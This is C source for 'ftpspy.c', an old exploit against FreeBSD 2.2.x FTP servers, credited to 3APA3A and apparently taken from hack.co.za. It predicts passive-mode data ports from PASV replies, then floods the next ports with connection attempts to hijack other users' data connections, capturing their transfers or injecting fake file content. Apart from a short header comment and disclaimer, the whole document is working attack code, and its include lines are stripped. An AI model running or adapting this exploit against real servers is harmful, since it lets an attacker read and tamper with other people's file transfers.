/* ftpspy.c This program is written to show vulnerability of some FTP servers then establish passive ftp connection. You MAY use this program or any part of it to test your ftp server for this vylnerability. You MUST NOT use this program or any part of it against another FTP server. The program distributed "AS IS" without any guarantees. This program uses the fact, that most TCP/IP stacks allocates TCP ports for applications one-by-one. Program creates FTP connection to FTPPORT of attacked machine, logs in as USER with PASS and then every RETRYDELAY seconds sends PASV command to server to find which TCP port is used now by server. After port is discovered program bombs next NTHREAD ports starting from found port + OFFSET with "connect" requests. Vuln: FreeBSD 2.2.1-2.2.5 (c) 1999 3APA3A aka Wise Tomcat Please send all your comments to wise@tomcat.ru /\_/\ { . . } |\ +--oQQo->{ ^ }<-----+ \ | 3APA3A U 3APA3A } +-------------o66o--+ / |/ */ #include #include #include #include #include #include #include #include #include #include #define DEBUGLEVEL 1 #define USER "USER ftp\012" #define PASS "PASS root@\012" #define PASV "PASV\012" #define NTHREADS 3 #define RETRYDELAY 10 #define FTPPORT 21 #define OFFSET 1 #define TIMEOUT 5 int gotit=0; char buf[4100]; long size; int port; char * text = "All my loving I will send to you\r\012All my loving, darling I'll be true\r\012 rw-r--r-- 1 1012 5 406 Aug 08 10:08 loving\r\012" ; void usage( char* progname) { fprintf(stderr, "Usage: %s ipaddr", progname); exit(1); } void getsignal(int sig) { if(!gotit) { #if DEBUGLEVEL > 2 fprintf(stderr, "Port %d killed\n", port); #endif exit(0); /* Papa asks me to shutdown! */ } } jmp_buf env; int needalarm=0; void br(int sig) { if(needalarm) longjmp(env,1); } /* Read FTP SERVER replies while they begins '###-'. Last line looks like '### '. */ void getftpdata(int sock) { char * newl; while((size = read(sock, buf, 1024)) > 0 ) { #if DEBUGLEVEL > 1 write(2, "<<", 2); write(2, buf, size); #endif if( size > 0 ) buf[size] = 0; for( newl=buf; newl && ((newl-buf) < (size-3)); newl = strchr(newl, '\012') ) if(newl[3] != '-' && isdigit(newl[1]) ) return; } } /* write command to FTP SERVER*/ void writeftpdata(int sock, char* data) { write(sock, data, strlen(data)); #if DEBUGLEVEL > 1 write(2, ">>", 2); write(2, data, strlen(data)); #endif } int main(int argc, char* argv[]) { struct sockaddr_in sin; int ftpsock, sock; char addr[16]; int i; int code, a1, a2, a3, a4, p1, p2; pid_t children[NTHREADS]; pid_t child; if(argc!=2) usage(argv[0]); sin.sin_addr.s_addr = inet_addr(argv[1]); sin.sin_family = AF_INET; sin.sin_port = htons(FTPPORT); if ((ftpsock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) { fprintf(stderr, "Error: Unable to allocate socket\n"); return -1; } /* connect to FTPPORT of FTP SERVER */ if( connect(ftpsock, (struct sockaddr*)&sin,sizeof(sin)) == -1 ) { fprintf(stderr, "Unable to connect %s:%d\n", argv[1], FTPPORT); return -2; } /* now log in as USER with PASS */ getftpdata(ftpsock); writeftpdata(ftpsock, USER); getftpdata(ftpsock); writeftpdata(ftpsock, PASS); getftpdata(ftpsock); #if DEBUGLEVEL > 0 fprintf(stderr, "Logged on\n"); #endif for(;;) { /* every RETRYDELAY seconds we send PASV command to FTP SERVER in order to have fresh inforamation about ports it listens */ writeftpdata(ftpsock, PASV); getftpdata(ftpsock); sscanf(buf, "%d Entering Passive Mode (%d,%d,%d,%d,%d,%d)", &code, &a1, &a2, &a3, &a4, &p1, &p2); if( code < 200 || code > 300 ) { fprintf(stderr, "Unable to enter PASV mode: %d\n", code); return -3; } sprintf(addr, "%d.%d.%d.%d", a1, a2, a3, a4); port = p1 * 256 + p2; /* FTP SERVER allocated this port for us */ #if DEBUGLEVEL > 2 fprintf(stderr, "Got port %d\n", port); #endif sin.sin_addr.s_addr = inet_addr(addr); #if DEBUGLEVEL > 2 fprintf(stderr, "Monitor: %s %d-%d\n", addr, port + 1, port + NTHREADS + OFFSET - 1); /* We will mpnitor this port range */ #endif /* now lets fork() with NTHREADS - one thfread for each port that will be bombed */ for( i=0; (i < NTHREADS) && (child = fork()); i++ ) children[i] = child; if(child) { /* Lucky PAPA */ #if DEBUGLEVEL > 2 fprintf(stderr, "%i threads started\n", i); #endif /* It's good time to sleep little bit and then to kill all this noisi children */ sleep(RETRYDELAY); for( i=0; i 2 fprintf(stderr, "Monitor port %d started\n", port); #endif signal(SIGUSR1, getsignal); signal(SIGALRM, br); sin.sin_port = htons(port); for(;;) { /* Lets bomb the port! */ if( (sock = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) { printf("Error: Unable to allocate socket\n"); return -1; } if( connect(sock, (struct sockaddr*)&sin,sizeof(sin)) != -1 ) break; close(sock); } gotit = 1; /* We did it!!! */ printf("Got it!!!! Port:%d\n", port); if(!setjmp(env)) { needalarm=1; alarm(TIMEOUT); while( (size = read(sock, buf, 4096)) > 0 ) { needalarm = 0; write (1, buf, size); } } else { writeftpdata(sock, text); } close(sock); return 0; } } return 0; } /* www.hack.co.za [2000]*/